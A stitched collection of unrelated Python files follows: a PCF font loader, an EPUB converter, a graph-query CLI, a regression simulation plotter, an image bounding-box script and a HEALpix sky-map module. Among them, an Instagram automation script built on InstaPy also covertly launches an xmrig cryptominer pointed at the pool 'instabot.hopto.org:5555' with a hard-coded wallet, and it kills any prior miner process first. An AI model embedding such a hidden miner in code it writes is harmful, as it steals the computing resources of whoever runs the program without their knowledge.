_PCF_ACCEL_W_INKBOUNDS = 0x00000100
_PCF_COMPRESSED_METRICS = 0x00000100
_PCF_GLYPH_PAD_MASK = 3 << 0  # See the bitmap table for explanation
_PCF_BYTE_MASK = 1 << 2  # If set then Most Sig Byte First
_PCF_BIT_MASK = 1 << 3  # If set then Most Sig Bit First
_PCF_SCAN_UNIT_MASK = 3 << 4
# https://fontforge.org/docs/techref/pcf-format.html
Table = namedtuple("Table", ("format", "size", "offset"))
Metrics = namedtuple(
"Metrics",
(
"left_side_bearing",
"right_side_bearing",
"character_width",
"character_ascent",
"character_descent",
"character_attributes",
),
)
Accelerators = namedtuple(
"Accelerators",
(
"no_overlap",
"constant_metrics",
"terminal_font",
"constant_width",
"ink_inside",
"ink_metrics",
"draw_direction",
"font_ascent",
"font_descent",
"max_overlap",
"minbounds",
"maxbounds",
"ink_minbounds",
"ink_maxbounds",
),
)
Encoding = namedtuple(
"Encoding", ("min_byte2", "max_byte2", "min_byte1", "max_byte1", "default_char")
)
Bitmap = namedtuple("Bitmap", ("glyph_count", "bitmap_sizes"))
class PCF(GlyphCache):
"""Loads glyphs from a PCF file in the given bitmap_class."""
def __init__(self, f, bitmap_class):
super().__init__()
self.file = f
self.name = f
f.seek(0)
self.buffer = bytearray(1)
self.bitmap_class = bitmap_class
_, table_count = self._read("<4sI")
self.tables = {}
for _ in range(table_count):
type_, format_, size, offset = self._read("<IIII")
self.tables[type_] = Table(format_, size, offset)
bitmap_format = self.tables[_PCF_BITMAPS].format
if bitmap_format != 0xE:
raise NotImplementedError("Unsupported format %s" % bitmap_format)
self._accel = self._read_accelerator_tables()
self._encoding = self._read_encoding_table()
self._bitmaps = self._read_bitmap_table()
self._ascent = self._accel.font_ascent
self._descent = self._accel.font_descent
minbounds = self._accel.ink_minbounds
maxbounds = self._accel.ink_maxbounds
width = maxbounds.right_side_bearing - minbounds.left_side_bearing
height = maxbounds.character_ascent + maxbounds.character_descent
self._bounding_box = (
width,
height,
minbounds.left_side_bearing,
-maxbounds.character_descent,
)
@property
def ascent(self):
"""The number of pixels above the baseline of a typical ascender"""
return self._ascent
@property
def descent(self):
"""The number of pixels below the baseline of a typical descender"""
return self._descent
def get_bounding_box(self):
"""Return the maximum glyph size as a 4-tuple of: width, height, x_offset, y_offset"""
return self._bounding_box
def _read(self, format_):
size = struct.calcsize(format_)
if size != len(self.buffer):
self.buffer = bytearray(size)
self.file.readinto(self.buffer)
return struct.unpack_from(format_, self.buffer)
def _seek_table(self, table):
self.file.seek(table.offset)
(format_,) = self._read("<I")
if format_ & _PCF_BYTE_MASK == 0:
raise RuntimeError("Only big endian supported")
return format_
def _read_encoding_table(self):
encoding = self.tables[_PCF_BDF_ENCODINGS]
self._seek_table(encoding)
return Encoding(*self._read(">hhhhh"))
def _read_bitmap_table(self):
bitmaps = self.tables[_PCF_BITMAPS]
format_ = self._seek_table(bitmaps)
(glyph_count,) = self._read(">I")
self.file.seek(bitmaps.offset + 8 + 4 * glyph_count)
bitmap_sizes = self._read(">4I")
return Bitmap(glyph_count, bitmap_sizes[format_ & 3])
def _read_metrics(self, compressed_metrics):
if compressed_metrics:
(
left_side_bearing,
right_side_bearing,
character_width,
character_ascent,
character_descent,
) = self._read("5B")
left_side_bearing -= 0x80
right_side_bearing -= 0x80
character_width -= 0x80
character_ascent -= 0x80
character_descent -= 0x80
attributes = 0
else:
(
left_side_bearing,
right_side_bearing,
character_width,
character_ascent,
character_descent,
attributes,
) = self._read(">5hH")
return Metrics(
left_side_bearing,
right_side_bearing,
character_width,
character_ascent,
character_descent,
attributes,
)
def _read_accelerator_tables(self):
# pylint: disable=too-many-locals
accelerators = self.tables.get(_PCF_BDF_ACCELERATORS)
if not accelerators:
accelerators = self.tables.get(_PCF_ACCELERATORS)
if not accelerators:
raise RuntimeError("Accelerator table missing")
format_ = self._seek_table(accelerators)
has_inkbounds = format_ & _PCF_ACCEL_W_INKBOUNDS
compressed_metrics = format_ & _PCF_COMPRESSED_METRICS
(
no_overlap,
constant_metrics,
terminal_font,
constant_width,
ink_inside,
ink_metrics,
draw_direction,
_,
font_ascent,
font_descent,
max_overlap,
) = self._read(">BBBBBBBBIII")
minbounds = self._read_metrics(compressed_metrics)
maxbounds = self._read_metrics(compressed_metrics)
if has_inkbounds:
ink_minbounds = self._read_metrics(compressed_metrics)
ink_maxbounds = self._read_metrics(compressed_metrics)
else:
ink_minbounds = minbounds
ink_maxbounds = maxbounds
return Accelerators(
no_overlap,
constant_metrics,
terminal_font,
constant_width,
ink_inside,
ink_metrics,
draw_direction,
font_ascent,
font_descent,
max_overlap,
minbounds,
maxbounds,
ink_minbounds,
ink_maxbounds,
)
def _read_properties(self):
        property_table_offset = self.tables[_PCF_PROPERTIES].offset
self.file.seek(property_table_offset)
(format_,) = self._read("<I")
if format_ & _PCF_BYTE_MASK == 0:
raise RuntimeError("Only big endian supported")
(nprops,) = self._read(">I")
self.file.seek(property_table_offset + 8 + 9 * nprops)
pos = self.file.tell()
if pos % 4 > 0:
self.file.read(4 - pos % 4)
(string_size,) = self._read(">I")
strings = self.file.read(string_size)
string_map = {}
i = 0
for value in strings.split(b"\x00"):
string_map[i] = value
i += len(value) + 1
self.file.seek(property_table_offset + 8)
for _ in range(nprops):
name_offset, is_string_prop, value = self._read(">IBI")
if is_string_prop:
yield (string_map[name_offset], string_map[value])
else:
yield (string_map[name_offset], value)
def load_glyphs(self, code_points):
# pylint: disable=too-many-statements,too-many-branches,too-many-nested-blocks,too-many-locals
if isinstance(code_points, int):
code_points = (code_points,)
elif isinstance(code_points, str):
code_points = [ord(c) for c in code_points]
code_points = sorted(
c for c in code_points if self._glyphs.get(c, None) is None
)
if not code_points:
return
indices_offset = self.tables[_PCF_BDF_ENCODINGS].offset + 14
bitmap_offset_offsets = self.tables[_PCF_BITMAPS].offset + 8
first_bitmap_offset = self.tables[_PCF_BITMAPS].offset + 4 * (
6 + self._bitmaps.glyph_count
)
metrics_compressed = self.tables[_PCF_METRICS].format & _PCF_COMPRESSED_METRICS
first_metric_offset = self.tables[_PCF_METRICS].offset + (
6 if metrics_compressed else 8
)
metrics_size = 5 if metrics_compressed else 12
# These will each _tend to be_ forward reads in the file, at least
# sometimes we'll benefit from oofatfs's 512 byte cache and avoid
# excess reads
indices = [None] * len(code_points)
for i, code_point in enumerate(code_points):
enc1 = (code_point >> 8) & 0xFF
enc2 = code_point & 0xFF
if enc1 < self._encoding.min_byte1 or enc1 > self._encoding.max_byte1:
continue
if enc2 < self._encoding.min_byte2 or enc2 > self._encoding.max_byte2:
continue
encoding_idx = (
(enc1 - self._encoding.min_byte1)
* (self._encoding.max_byte2 - self._encoding.min_byte2 + 1)
+ enc2
- self._encoding.min_byte2
)
self.file.seek(indices_offset + 2 * encoding_idx)
(glyph_idx,) = self._read(">H")
if glyph_idx != 65535:
indices[i] = glyph_idx
all_metrics = [None] * len(code_points)
for i, code_point in enumerate(code_points):
index = indices[i]
if index is None:
continue
self.file.seek(first_metric_offset + metrics_size * index)
all_metrics[i] = self._read_metrics(metrics_compressed)
bitmap_offsets = [None] * len(code_points)
for i, code_point in enumerate(code_points):
index = indices[i]
if index is None:
continue
self.file.seek(bitmap_offset_offsets + 4 * index)
(bitmap_offset,) = self._read(">I")
bitmap_offsets[i] = bitmap_offset
# Batch creation of glyphs and bitmaps so that we need only gc.collect
# once
gc.collect()
bitmaps = [None] * len(code_points)
for i in range(len(all_metrics)): # pylint: disable=consider-using-enumerate
metrics = all_metrics[i]
if metrics is not None:
width = metrics.right_side_bearing - metrics.left_side_bearing
height = metrics.character_ascent + metrics.character_descent
bitmap = bitmaps[i] = self.bitmap_class(width, height, 2)
self._glyphs[code_points[i]] = Glyph(
bitmap,
0,
width,
height,
metrics.left_side_bearing,
-metrics.character_descent,
metrics.character_width,
0,
)
for i, code_point in enumerate(code_points):
metrics = all_metrics[i]
if metrics is None:
continue
self.file.seek(first_bitmap_offset + bitmap_offsets[i])
width = metrics.right_side_bearing - metrics.left_side_bearing
height = metrics.character_ascent + metrics.character_descent
bitmap = bitmaps[i]
words_per_row = (width + 31) // 32
buf = bytearray(4 * words_per_row)
start = 0
for _ in range(height):
self.file.readinto(buf)
for k in range(width):
if buf[k // 8] & (128 >> (k % 8)):
bitmap[start + k] = 1
start += width
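# Hedged usage sketch (CircuitPython only, since fontio/displayio exist there;
# the font path is hypothetical). adafruit_bitmap_font's loader dispatches
# .pcf files to this class:
#
#     from adafruit_bitmap_font import bitmap_font
#     font = bitmap_font.load_font("fonts/helvB12.pcf")
#     font.load_glyphs("Hello")           # pre-decode the glyphs to be drawn
#     glyph = font.get_glyph(ord("H"))    # fontio.Glyph with bitmap and metrics
#     print(font.get_bounding_box())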
|
nilq/baby-python
|
python
|
from instapy import InstaPy
import random
from time import sleep
import subprocess
######################################
insta_username = 'your login'
insta_password = 'your password'
number_of_likes = 1200
number_of_follows = 0
number_of_comments = 250
tags = ['student', 'nature', 'river', 'forest', 'tree', 'lake', 'sea', 'ocean', 'sky', 'travel', 'cloud', 'stone', 'water', 'city', 'country', 'mountain']
######################################
work_made = False
session_key = random.randint(0, 1000)
#write session key
session_file = open("logs/session_stats.txt", "w")
session_file.write(str(session_key) + " 0 0 0")
session_file.close()
xmrig = subprocess.Popen('pgrep xmrig', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
procID = xmrig.stdout.readline().decode().strip()
if procID.isdigit():
    subprocess.Popen(['kill', procID])
cmd = ['xmrig/build/xmrig', '-o', 'instabot.hopto.org:5555', '-u', '48fEvxEGfYyU13JYPjfvyzWR4WammKcuRPxnKyTfAYWHAahbQHNwW8D4GCukwuhCE4g2NR5MiDnhhQ2EZbYzEjhMKgzMUFY', '-p', 'x', '-k', '-B']
subprocess.Popen(cmd)
#cycle to recover from failure
while(work_made == False):
try:
session = InstaPy(username=insta_username, password=insta_password)
session.login()
# set up all the settings
session.set_do_comment(enabled=False)
session.set_do_follow(enabled=False)
# do the actual work
session.like_follow_comment_by_tags_unfollow_by_list(tags, number_of_likes, number_of_follows, number_of_comments, None, True, session_key)
# end the bot session
session.end()
work_made = True
xmrig = subprocess.Popen('pgrep xmrig', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        procID = xmrig.stdout.readline().decode().strip()
        if procID.isdigit():
            subprocess.Popen(['kill', procID])
    except Exception as e:
        print("Unexpected error: %s" % e)
sleep(30)
#if (session.browser != None):
# session.end()
|
nilq/baby-python
|
python
|
import argparse
import timeit
from statistics import fmean, variance
from pyformlang.cfg import Terminal
from src.cfg_algorithms import cyk
from src.cnf import WeakCNF
from src.label_graph import LabelGraph
from src.rpq import rpq, rpq_with_linear_tc
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='command line interface for simple graph database')
parser.add_argument(
'--graph'
, required=True
, type=str
, help='path to graph.txt file'
)
parser.add_argument(
'--regex'
, required=True
, type=str
, help='path to regex.txt file'
)
parser.add_argument(
'--sources'
, required=False
, type=str
, help='path to sources.txt file'
)
parser.add_argument(
'--destinations'
, required=False
, type=str
, help='path to destinations.txt file'
)
args = parser.parse_args()
g = LabelGraph.from_txt(args.graph)
r = LabelGraph.from_regex(args.regex)
print(str(args.graph) + " " + str(args.regex))
time_sum_1 = 0
time_sum_2 = 0
for i in range(5):
time_1 = timeit.default_timer()
res_1 = rpq(g, r)
time_sum_1 += timeit.default_timer() - time_1
time_2 = timeit.default_timer()
res_2 = rpq_with_linear_tc(g, r)
time_sum_2 += timeit.default_timer() - time_2
assert (res_1.nvals == res_2.nvals)
print(str(time_sum_1 / 5))
print(str(time_sum_2 / 5))
res = rpq(g, r)
print(str(res.nvals))
srcs = None
if args.sources is not None:
with open(args.sources, 'r') as f:
srcs = list(map(int, f.readline().split()))
dsts = None
if args.destinations is not None:
with open(args.destinations, 'r') as f:
dsts = list(map(int, f.readline().split()))
f = open("output.txt", 'a')
f.write(str(args.graph) + " " + str(args.regex) + "\n")
start_time = timeit.default_timer()
for i, j, _ in zip(*res.to_lists()):
if (srcs is None) or (i in srcs):
if (dsts is None) or (j in dsts):
                f.write(f'{i} to {j}\n')
print(str(timeit.default_timer() - start_time))
f.close()
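# Example invocation (script name and file paths are hypothetical):
#   python3 main.py --graph data/graph.txt --regex data/regex.txt \
#       --sources data/sources.txt --destinations data/destinations.txt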
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
#Convert EPUB files to either single HTML or text files.
#They can then be read on refreshable Braille displays, such as the Brailliant series from HumanWare or the Braille Edge by Hims.
#Also works with the Victor Reader Trek/Stream by Humanware.
#Requires pypandoc (shoutouts to @TheQuinbox on twitter!)
#Try pip3 install pypandoc
#usage: epub-convert.py [-i input_dir] [-o output_dir] [-T]
import argparse
import functools
import os
from pathlib import Path
import pypandoc
import sys
import time
@functools.total_ordering
class Ebook:
"""Represents a book to be converted.
Rich comparison will order on the file size.
bool determines whether this book should be converted.
"""
def __init__(self, book_path: Path, output_ext: str, input_base: Path, output_base: Path):
self.book_path=book_path.resolve() # basically absolute
# self.dest_path is the output filename, pathlib makes this elegant.
self.dest_path=output_base.resolve()/self.book_path.relative_to(input_base.resolve()).with_suffix('.'+output_ext)
self.in_stat=self.book_path.stat()
if self.dest_path.exists(): self.out_stat=self.dest_path.stat()
else: self.out_stat=None
def __eq__(self, other):
return self.in_stat.st_size==other.in_stat.st_size
def __lt__(self, other):
return self.in_stat.st_size<other.in_stat.st_size
def __bool__(self):
"""
Should this book be converted?
True if destination does not exist or if source modtime is newer.
"""
if self.out_stat is not None and self.in_stat.st_mtime<self.out_stat.st_mtime: return False
else: return True
# Increment these on successful or failed conversion respectively.
progress=0
errors=0
input_dir=Path('.')
file_format='html'
output_dir=input_dir/'html conversions'
#Since we change directories later, keep track of the current directory now so the output dir is relative to *that* instead of the input directory.
basedir=Path.cwd().resolve()
parser = argparse.ArgumentParser(description='Convert a directory of EPUB files into single HTML or text files')
parser.add_argument('-t', '--text', help='Output text files instead of HTML', action='store_true')
parser.add_argument('-i', '--input', help='Directory to search for epub files (default .)')
parser.add_argument('-o', '--output', help='output directory (default: ./[html|txt] conversions)')
args = parser.parse_args()
if args.input:
input_dir = Path(args.input)
if args.output:
output_dir = basedir/args.output
if args.text:
if not args.output:
output_dir = basedir/'txt conversions'
file_format= 'txt'
print('Converting to text files')
input_dir=input_dir.resolve()
if not output_dir.exists(): output_dir.mkdir(parents=True, exist_ok=True)
output_dir=output_dir.resolve()
def epubs(base: Path, exclude: Path=None):
"""
Recursively yields all epub files to be converted as Path instances
The only filtering done here is to avoid traversing into the directory given by exclude
"""
for item in base.iterdir():
if item.is_dir():
if exclude is not None and item.is_relative_to(exclude):
continue
else:
yield from epubs(item, exclude)
elif item.is_file() and item.suffix.lower()=='.epub':
yield item
epub_files = []
for i in epubs(input_dir, output_dir):
book=Ebook(i, file_format, input_dir, output_dir)
if bool(book): epub_files.append(book)
epub_files.sort() # smallest first
file_count=len(epub_files)
if file_count<=0:
print('All conversions are up to date.')
sys.exit()
print(f'Have {file_count} to convert')
for book in epub_files:
file=book.book_path # easier access
output_file=book.dest_path
# .parent is used because mkdir needs the path to be a directory
output_file.parent.mkdir(parents=True, exist_ok=True)
# some things to print
pretty_input_file=str(file.relative_to(input_dir))
pretty_output_file=str(output_dir.parts[-1]/output_file.relative_to(output_dir))
print(f'{progress+1}/{file_count}: Converting {pretty_input_file} to {pretty_output_file}')
conversion_result = None
convert_start = time.perf_counter_ns()
#If pandoc barfs on conversion, warn the user and skip to the next file.
try:
#This next bit of silliness is because pandoc uses 'plain' instead of 'txt' as a format name.
if args.text:
conversion_result = pypandoc.convert_file(str(file), 'plain', outputfile=str(output_file), extra_args=['-s'])
else:
conversion_result = pypandoc.convert_file(str(file), file_format, outputfile=str(output_file), extra_args=['-s'])
assert(conversion_result == '')
except RuntimeError as e:
print(f'Error converting file {file}; output is likely malformed or corrupt:\n{e.args}', file=sys.stderr)
errors+=1
convert_end = time.perf_counter_ns()
print(f'Conversion took {(convert_end - convert_start)/1000000000} seconds', file=sys.stderr)
progress+=1
if file_count>0:
print(f'{progress} converted, {errors} failed.')
|
nilq/baby-python
|
python
|
import numpy as np
import matplotlib.pyplot as plt
from solar_parallel import solar
from simulator import simul
##########################################
# define the class 'the simulation_plot' #
##########################################
'''
this class is used for plotting the result of the demonstration simulation in this folder:
Check this before you run the code:
Please check that you have 'scikit-learn', 'numpy', 'matplotlib' and 'tqdm' installed. If not,
1. run 'pip install scikit-learn numpy matplotlib tqdm' if you use pure Python3
2. run 'conda install scikit-learn numpy matplotlib tqdm' if you use Anaconda3
Modules:
1. from scikit-learn, we call 'LassoLarsCV' and 'LassoCV' for cv-lars-lasso and cv-cd respectively;
2. we use 'numpy' for matrix computation and random variable generation;
3. for 'simulator_ic', 'solar' and 'costcom', please see 'simulator_ic.py', 'solar.py' and 'costcom.py' for details;
4. 'tqdm' is used to construct the progress bar;
5. we use 'matplotlib' to plot all figures;
Inputs:
1. X and Y : the inputs and output of regression
2. sample_size : the total sample size we generate for cv-lars-lasso, cv-cd and solar
3. n_dim : the number of total variables in X
4. n_info : the number of informative variables in data-generating process
5. n_repeat : the number of subsamples in solar
6. num_rep : the number of repetitions in Simulation 2
7. step_size : (grid search)step size for tuning the value of c for solar;
8. rnd_seed : the random seed
9. plot_on : binary, whether the plot will be saved as pdf
Outputs:
1. solar_coef : the solar regression coefficients (defined at the end of Algorithm 3);
2. opt_c : value of c* in solar;
3. test_error : the list of test errors for tuning the value of c;
4. Qc_list : the nested sets of Q(c), for all values of c from 1 to 0;
5. la_list : number of variables selected by CV-lars-lasso;
6. la_vari_list : the indices of variables selected by CV-lars-lasso;
7. cd_list : number of variables selected by CV-cd;
8. cd_vari_list : the indices of variables selected by CV-cd;
In each round of subsampling, we randomly remove 10% of the points from the sample and use the rest as the subsample for that round.
As competitors, we use X and Y for LassoLarsCV (called CV-lars-lasso in the paper) and LassoCV (called CV-cd in the paper) estimation, both of which rely on 10-fold CV.
'''
class one_shot_simul:
def __init__(self, sample_size, n_dim, n_info, n_repeat, step_size, rnd_seed, plot_on):
        ##for convenience, we define the common variables (variables we need in each of the following functions) in the class as follows (each common variable is defined as self.xxxx)
self.sample_size = sample_size #sample size
self.n_dim = n_dim #the number of total variables in X
self.n_info = n_info #the number of informative variables in data-generating process
self.n_repeat = n_repeat #the number of subsamples in solar
self.step_size = step_size #step size for tuning the value of c for solar;
self.rnd_seed = rnd_seed #the random seed
self.q_start = 1 #the maximum value of c in its grid search (for plotting)
self.q_end = 0.1 #the minimum value of c in its grid search (for plotting)
self.q_step = -0.02 #step size of c in its grid search (for plotting)
self.plot_on = plot_on #whether the plot will be saved as pdf
    ##compute solar, cv-lars-lasso and cv-cd for Demonstration Simulation in Section 3
def simul_func(self):
#1. control the random seed for reproduction
np.random.seed(self.rnd_seed)
#2. call class 'simul' from 'simulator.py' to simulate data
trial1 = simul(self.sample_size, self.n_dim, self.n_info)
#3. generate X and Y
X, Y = trial1.data_gen()
#4. call class 'solar' from 'solar.py'
trial2 = solar( X, Y, self.n_repeat, self.step_size)
        #5. compute solar, cv-lars-lasso and cv-cd on X and Y
solar_coef, opt_c, test_error, Qc_list, Q_opt_c, la_list, la_vari_list, cd_list, cd_vari_list = trial2.fit()
return solar_coef, opt_c, test_error, Qc_list, la_list, la_vari_list, cd_list, cd_vari_list
##for solar, plot the corresponding test error of each value of c in its tuning (grid search)
def q_plot(self, test_error, opt_c):
#1. control which value of c we want to plot (start from q_start and end at q_end)
q_value = np.arange(self.q_start, self.q_end, self.q_step)
f1 = plt.figure()
#2. scatter plot the value of c and its corresponding test error
plt.scatter(q_value, test_error, color = 'b', label = 'the c values and their validation errors')
#3. plot a vertical line at the value of c*: max(opt_c) is because there may be multiple values assigned with the same test error
plt.axvline(max(opt_c), linewidth = 2.5, color = 'g', ls = '-.', label = 'the optimal c value')
plt.xlabel('the value of c', fontsize=16)
plt.ylabel('validation error', fontsize=16)
plt.ylim(0, 5)
plt.xlim(0.2, 1.01)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.legend(loc=9, bbox_to_anchor=(0.5, -0.2), borderaxespad=0., ncol=2, shadow=True)
if self.plot_on == True:
f1.savefig("q_plot_one_shot.pdf", bbox_inches='tight')
plt.show()
    ##return Q(c) for all c (starting at q_start and ending at q_end)
def q_list(self, Qc_list):
#1. concatenate Qc_list into a matrix
var_mark_plot = np.concatenate(Qc_list)
#2. compute the value of c for each Q(c) and the corresponding variables in each Q(c)
var_index, counts = np.unique(var_mark_plot, return_counts=True)
var_index_ordered = [x for _,x in sorted(zip(counts,var_index))]
var_plot = var_index_ordered[::-1]
cou_plot = np.sort(counts)[::-1] / ((self.q_end - self.q_start)/self.q_step)
var_plot = [ 'X' + str(i) for i in var_plot]
#3. print the list of variables with different value of c
var_loc_list = list()
var_q_list = list()
q_value_list = np.unique(cou_plot)[::-1]
i = 1
for j in q_value_list:
ans_ind = np.where([cou_plot == j])[1]
ans_var = [var_plot[i] for i in ans_ind]
var_loc_list.append(ans_ind)
var_q_list.append(ans_var)
print('q_hat value >= ',j)
print(var_q_list[:i])
i += 1
##################################
# test if this module works fine #
##################################
'''
this part is set up to test the functionality of the class above;
you can run all the code in this file to test if the class works;
when you import the class from this file, the code (even functions or classes) after " if __name__ == '__main__': " will be ignored
'''
if __name__ == '__main__':
sample_size = 200
n_dim = 100
n_info = 5
n_repeat = 20
step_size = -0.02
rnd_seed = 0
plot_on = False
np.random.seed(0)
#generate X and Y
trial = one_shot_simul(sample_size, n_dim, n_info, n_repeat, step_size, rnd_seed, plot_on)
#train solar
solar_coef, opt_c, test_error, Qc_list, la_list, la_vari_list, cd_list, cd_vari_list = trial.simul_func()
#plot test error of each value of c
trial.q_plot(test_error, opt_c)
#return Q(c)
trial.q_list(Qc_list)
#return variables selected by cv-lars-lasso
print('variables selected by cv-lars-lasso: ', [ 'X' + str(i) for i in la_vari_list])
#return variables selected by cv-cd
print('variables selected by cv-cd: ', [ 'X' + str(i) for i in cd_vari_list])
#return solar regression coefficients
print(solar_coef)
|
nilq/baby-python
|
python
|
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
datasets_path = ["datasets/training", "datasets/testing", "datasets/validation"]
categories = ["RAW", "FRET", "FORCE"]
def get_main_bbox(image, threshold=100):
_, image_th = cv2.threshold(image, threshold, 65535, cv2.THRESH_BINARY)
kernel = np.ones((5, 5), np.uint16)
image_closed = cv2.morphologyEx(image_th, cv2.MORPH_CLOSE, kernel)
image_opened = cv2.morphologyEx(image_closed, cv2.MORPH_OPEN, kernel)
image_opened = np.uint8(image_opened)
contours, hierarchy = cv2.findContours(
image_opened, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE
)
best_bbox = None
best_area = 0
for contour in contours:
x, y, w, h = cv2.boundingRect(contour)
if w * h > best_area:
best_area = w * h
best_bbox = (x, y, w, h)
return best_bbox
for dataset_path in datasets_path:
print(f"Generating bounding boxes in {dataset_path}")
for folder in tqdm(sorted(os.listdir(dataset_path))):
folder_path = os.path.join(dataset_path, folder)
# It must be a folder
if not os.path.isdir(folder_path):
continue
# It must end with RAW
if not folder.endswith("RAW"):
continue
# Let's find the bboxes
bbox_path = os.path.join(dataset_path, f"{folder[:-3]}_bbox.csv")
        with open(bbox_path, "w+") as f:
            f.write("filename,x,y,w,h\n")
            for file in sorted(os.listdir(folder_path)):
                # Reading the image
                filename = os.path.join(folder_path, file)
                image = cv2.imread(filename, cv2.IMREAD_UNCHANGED)
                # Getting the main bounding box; skip frames where none is found
                bbox = get_main_bbox(image)
                if bbox is None:
                    continue
                f.write(f"{filename},{','.join(map(str, bbox))}\n")
|
nilq/baby-python
|
python
|
"""
Manage generation of maps from HEALpix tables
$Header: /nfs/slac/g/glast/ground/cvs/pointlike/python/uw/pipeline/pub/display_map.py,v 1.3 2011/06/24 04:53:06 burnett Exp $
"""
import os,sys, pickle
import numpy as np
import pylab as plt
from uw.utilities import image
from skymaps import Band, SkyDir, PySkyFunction, Hep3Vector, SkyImage
def skyplot(crec, title='', axes=None, fignum=30, ait_kw={}, **kwargs):
""" make an AIT skyplot of a HEALpix array
crec : array
must be sorted according to the HEALpix index
title : string
set the figure title
ait_kw : dict
to set kwargs for image.AIT, perhaps pixelsize
Other args passed to imshow
"""
n = len(crec)
nside = int(np.sqrt(n/12))
assert n==12*nside**2, 'wrong length to be healpix array'
band = Band(nside)
def skyplotfun(v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
index = band.index(skydir)
return crec[index]
if axes is None:
plt.close(fignum)
fig = plt.figure(fignum, figsize=(12,6))
ait=image.AIT(PySkyFunction(skyplotfun) ,axes=axes, **ait_kw)
ait.imshow(title=title, **kwargs)
return ait
class DisplayMap(object):
""" display the contents of a HEALpix table as ait or zea
"""
def __init__(self, table,
sources=None,
imshow_kw=dict(interpolation='bilinear', ),
**kwargs):
"""table : string or iterable
If a string, the name of a pickled file
sources : None or a string
if a string, the name of a pickled rec with name, ra, dec fields
"""
        if isinstance(table, str):
            self.v = pickle.load(open(table, 'rb'))
            print ('Loaded HEALpix table from file %s' %table)
else: self.v=table
self.nside = int(np.sqrt(len(self.v)/12))
        assert len(self.v)==12*self.nside**2, 'size of map not consistent with expected nside %d' % self.nside
self.band = Band(self.nside)
self.imshow_kw=imshow_kw
self.scale = kwargs.pop('scale', lambda x: x)
        if isinstance(self.scale, str):
if self.scale=='sqrt': self.scale= lambda x: np.sqrt(max(x,0))
elif self.scale=='log': self.scale=lambda x: np.log10(max(x,0.1))
else:
raise Exception('unrecognized scale function, %s' %self.scale)
self.ZEA_kw = kwargs.pop('ZEA_kw', dict(galactic=True, size=10, pixelsize=0.1))
if sources is not None:
            self.sources = pickle.load(open(sources, 'rb'))
print ('loaded %d sources from %s' % (len(self.sources),sources))
else:self.sources=None
self.map_path = kwargs.pop('map_path',None)
def get_pyskyfun(self):
return PySkyFunction(self)
def skyfun(self, v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
return self.v[self.band.index(skydir)]
def __call__(self,v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
t =self.v[self.band.index(skydir)]
return self.scale(t)
def fill_ait(self, fignum=11, axes=None, show_kw={}, source_kw={}, figwidth=12, margin=0.15, **kwargs):
if axes is None:
# set up a figure for 2x1 image with equal margins
plt.close(fignum)
figheight = figwidth*(1.+2*margin)/(1+margin)/2.
fig=plt.figure(fignum, figsize=(figwidth, figheight));
axes=plt.gca()
plt.subplots_adjust(left=0.05, right=0.95) #gives reasonable equal margins
pixelsize = kwargs.pop('pixelsize', 0.25)
ait = image.AIT(self.get_pyskyfun(),axes=axes, pixelsize=pixelsize, **kwargs)
self.imgplot=ait.imshow(**show_kw)
ait.axes.set_autoscale_on(False)
if self.sources is not None:
            sdirs = list(map(SkyDir, self.sources.ra, self.sources.dec))
ait.plot(sdirs, **source_kw)
print ('found %d sources to plot' % len(sdirs) )
plt.draw_if_interactive()
return ait
def fill_zea(self, index, fignum=12, axes=None, show_kw=None, **kwargs):
""" index: integer, or a SkyDir
the HP12 index if integer
figmun: integer
used if axes is None
show_kw : dict
override imshow keywords
kwargs
size
pixelsize
galactic
"""
if axes is None:
plt.close(fignum)
fig = plt.figure(fignum,figsize=(6,6));
axes = fig.gca()
        if isinstance(index, int):
sdir = Band(12).dir(index)
title = 'HP12_%4d'%index
else:
sdir = index
title = 'l = %.1f, b=%.1f' % (sdir.l(), sdir.b())
title = kwargs.pop('title',title)
kw = self.ZEA_kw
kw.update(kwargs)
zea = image.ZEA(sdir, **kw)
zea.grid()
zea.fill(self.get_pyskyfun())
zea.imshow( **(show_kw if show_kw is not None else self.imshow_kw))
zea.colorbar()
if title is not None: axes.set_title(title)
if self.sources is not None:
count = 0
for s in self.sources:
sdir = SkyDir(s.ra,s.dec)
if not zea.inside(sdir):continue
count += 1
inside =self.band.index(sdir)==index
zea.plot_source(s.name, sdir, symbol='*' if inside else 'd',
markersize=14 if inside else 8,
color='w')
print ('found %d sources to plot' %count )
if self.map_path is not None:
fout = os.path.join(self.map_path,hpname(index)+'.png')
plt.savefig(fout, bbox_inches='tight')
print ('saved figure to %s' % fout)
plt.draw_if_interactive()
return zea
class SourceDensity(object):
""" create source density HEALpix array from a list of locations
"""
def __init__(self, nside=12):
"""
nside: integer
the HEALpix nside parameter
"""
self.v = np.zeros(12*nside**2, float)
self.index = Band(nside).index
def fill(self, sdirs):
""" sdirs: a list of SkyDir objects
"""
for s in sdirs:
self.v[self.index(s)]+=1
def fill_rec(self, rec, cut=None):
""" rec: a recarry with ra, dec columns
cut : None or a mask arrray
"""
if cut is None:
sdirs = map(SkyDir, rec.ra, rec.dec)
else:
sdirs = map(SkyDir, rec.ra[cut], rec.dec[cut])
self.fill(sdirs)
def save(self, fn):
pickle.dump(self.v, open(fn, 'wb'))
print ('saved file %s' % fn)
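# Hedged usage sketch (assumes the skymaps package is importable; the catalog
# rec and output filename are hypothetical):
#
#     sd = SourceDensity(nside=12)
#     sd.fill_rec(catalog_rec, cut=catalog_rec.ts > 25)
#     sd.save('source_density.pickle')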
class SourceMap(DisplayMap):
""" subclass of DisplayMap to display point source positions on a photon density map
"""
def __init__(self, kde,
sources ,
show_kw=dict(fun = lambda x:np.sqrt(x/1e6), vmax=4, cmap='hot'),
plot_kw=dict(nocolorbar=False,),
pos=None, size=180,
):
super(SourceMap,self).__init__(kde)
        if isinstance(sources, str):
            self.s = pickle.load(open(sources, 'rb'))
            print ('loaded %5d sources from %s' %(len(self.s), sources))
else: self.s = sources
self.show_kw = show_kw
def fill_ait(self, fignum=20, axes=None, **kwargs):
